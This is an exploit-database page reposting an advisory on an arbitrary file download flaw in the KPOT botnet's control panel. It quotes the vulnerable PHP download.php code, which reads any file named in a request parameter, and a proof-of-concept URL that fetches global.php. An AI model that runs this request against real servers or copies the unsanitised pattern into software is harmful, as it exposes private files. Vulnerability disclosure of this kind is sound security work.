Advertisement






KPOT Botnet - File Download/Source Code Disclosure Vulnerability

CVE Category Price Severity
N/A CWE-Other N/A High
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2018-12-01
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 0.021743 0.34519

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120005

Below is a copy:

KPOT Botnet - File Download/Source Code Disclosure Vulnerability
################################
# Exploit Title: KPOT Botnet - File Download/Source Code Disclosure Vulnerability
# Google Dork: n/a
# Date: 26/11/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: https://bhf.io/threads/515432/
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: download.php
<?php
if (isset($_GET['file']))
{
$file = $_GET['file'];
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: ' . filesize($file));
readfile($file);
}
?>
################################
PoC:
http://127.0.0.1/download.php?file=global.php

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum